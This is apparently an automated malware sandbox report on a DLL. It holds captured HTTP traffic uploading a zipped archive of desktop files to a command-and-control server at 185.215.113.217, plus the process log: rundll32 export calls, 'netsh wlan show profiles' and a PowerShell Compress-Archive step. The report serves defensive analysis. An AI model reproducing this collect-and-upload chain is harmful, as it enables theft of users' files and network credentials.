                                              Oct 26, 2024 19:13:43.940712929 CEST174OUTPOST /CoreOPT/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.217
                                              Content-Length: 21
                                              Cache-Control: no-cache
                                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                              Data Ascii: id=246122658369&cred=
                                              Oct 26, 2024 19:13:44.949290037 CEST190INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Sat, 26 Oct 2024 17:13:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0
                                              Oct 26, 2024 19:14:06.716114044 CEST170OUTPOST /CoreOPT/index.php?wal=1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=----NDYxMg==
                                              Host: 185.215.113.217
                                              Content-Length: 4772
                                              Cache-Control: no-cache
                                              Oct 26, 2024 19:14:06.716209888 CEST140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4d 67 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                              Data Ascii: ------NDYxMg==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                              Oct 26, 2024 19:14:06.716209888 CEST8OUTData Raw: 50 4b 03 04 14 00 00 00
                                              Data Ascii: PK
                                              Oct 26, 2024 19:14:06.716331959 CEST8OUTData Raw: 08 00 53 40 44 57 ba eb
                                              Data Ascii: S@DW
                                              Oct 26, 2024 19:14:06.716373920 CEST8OUTData Raw: bd 05 84 02 00 00 02 04
                                              Data Ascii:
                                              Oct 26, 2024 19:14:06.716408014 CEST8OUTData Raw: 00 00 17 00 00 00 5f 46
                                              Data Ascii: _F
                                              Oct 26, 2024 19:14:06.716456890 CEST8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                              Data Ascii: iles_\DV
                                              Oct 26, 2024 19:14:06.716456890 CEST8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                              Data Ascii: WHKMNFNN
                                              Oct 26, 2024 19:14:06.716531038 CEST8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                              Data Ascii: .docxI
                                              Oct 26, 2024 19:14:06.716553926 CEST8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                              Data Ascii: r@!D
                                              Oct 26, 2024 19:14:06.716634035 CEST8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                              Data Ascii: ?p
                                              Oct 26, 2024 19:14:07.256122112 CEST190INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Sat, 26 Oct 2024 17:14:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449732185.215.113.217807380C:\Windows\System32\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 26, 2024 19:13:50.828938961 CEST174OUTPOST /CoreOPT/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.217
                                              Content-Length: 21
                                              Cache-Control: no-cache
                                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                              Data Ascii: id=246122658369&cred=
                                              Oct 26, 2024 19:13:51.880073071 CEST190INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Sat, 26 Oct 2024 17:13:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:13:13:41
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\loaddll64.exe
                                              Wow64 process (32bit):false
                                              Commandline:loaddll64.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll"
                                              Imagebase:0x7ff626820000
                                              File size:165'888 bytes
                                              MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:13:13:41
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:13:13:42
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1
                                              Imagebase:0x7ff71d710000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:13:13:42
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,Main
                                              Imagebase:0x7ff7ced20000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:13:13:42
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1
                                              Imagebase:0x7ff7ced20000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:13:13:42
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\netsh.exe
                                              Wow64 process (32bit):false
                                              Commandline:netsh wlan show profiles
                                              Imagebase:0x7ff7a4bb0000
                                              File size:96'768 bytes
                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:13:13:42
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\netsh.exe
                                              Wow64 process (32bit):false
                                              Commandline:netsh wlan show profiles
                                              Imagebase:0x7ff7a4bb0000
                                              File size:96'768 bytes
                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:13:13:42
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:13:13:42
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:13:13:44
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:13:13:44
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:13:13:44
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:13:13:44
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:13:13:45
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,Save
                                              Imagebase:0x7ff7ced20000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:13:13:48
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",Main
                                              Imagebase:0x7ff7ced20000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:13:13:48
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",Save
                                              Imagebase:0x7ff7ced20000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:13:13:49
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\netsh.exe
                                              Wow64 process (32bit):false
                                              Commandline:netsh wlan show profiles
                                              Imagebase:0x7ff7a4bb0000
                                              File size:96'768 bytes
                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:13:13:49
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:18
                                              Start time:13:13:51
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:13:13:51
                                              Start date:26/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFD9B3E55CD Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1933080869.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: U
                                                • API String ID: 0-3372436214
                                                • Opcode ID: e084dfa0175c6d4e18e99bffdf0e7018633d95998af476548e5d7df8dfd7241c
                                                • Instruction ID: 707f157a8375bba7cfcfebc627d9e39c4fc5145cf0536c38eca2d36fed90d28d
                                                • Opcode Fuzzy Hash: e084dfa0175c6d4e18e99bffdf0e7018633d95998af476548e5d7df8dfd7241c
                                                • Instruction Fuzzy Hash: 30B1E452A0FBCA1FE766E77808754A07FA1EF52250B0B01FFD099CB4E3E9186D498352
                                                Function 00007FFD9B3EC725 Relevance: .4, Instructions: 448COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1933080869.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad31134aa2dd975626e9f585b3465e23d089d52df929723c06bf6bbb3e1218e1
                                                • Instruction ID: 11d9f3e87a60c9542633f91f61417d7284363239a5b7e791bd91d143b98f9d7c
                                                • Opcode Fuzzy Hash: ad31134aa2dd975626e9f585b3465e23d089d52df929723c06bf6bbb3e1218e1
                                                • Instruction Fuzzy Hash: 4FD11362A0FA8D1FEB65EBB848759B97BE1EF56210B4901FFD05CC70E3DA18A905C341
                                                Function 00007FFD9B3E572D Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1933080869.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47e50a2961fb134506f39f5fea7cbc809082d99e263e157f40ee59e1ea8c90b7
                                                • Instruction ID: 600af58ea4d258e6737d25c0c6d9ae8a5326be95bf41ccad7c508feeae04b9f7
                                                • Opcode Fuzzy Hash: 47e50a2961fb134506f39f5fea7cbc809082d99e263e157f40ee59e1ea8c90b7
                                                • Instruction Fuzzy Hash: 0921BF56A0FBC54FE762AB784C355A13FA0AF03220B0B02FFD0EACB4E3D91829558751
                                                Function 00007FFD9B3133B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1931076164.00007FFD9B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B310000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7ffd9b310000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                • Instruction ID: 490897f6c02418b6ba93d14121cd4d35e93682487e7a330eed8c64544e290f08
                                                • Opcode Fuzzy Hash: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                • Instruction Fuzzy Hash: 7D01A73021CB0C4FDB48EF0CE051AB5B7E0FB85320F10056EE58AC36A1DA36E882CB45

                                                Non-executed Functions

                                                Function 00007FFD9B3100AD Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1931076164.00007FFD9B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B310000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7ffd9b310000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b1747d3b8a5ed588e1d75a179576d10bb5076d6a6c0b05631aef10cdf48a180
                                                • Instruction ID: 9f2ecb8e45bac72cfb7ac7dc1a6a21adde4ce7350f33b22208efc87fe14d153c
                                                • Opcode Fuzzy Hash: 6b1747d3b8a5ed588e1d75a179576d10bb5076d6a6c0b05631aef10cdf48a180
                                                • Instruction Fuzzy Hash: 0E512887E0F5C66BF666A7FC18350A96B54FF63B1031E40FFC099460E7AD48A9098381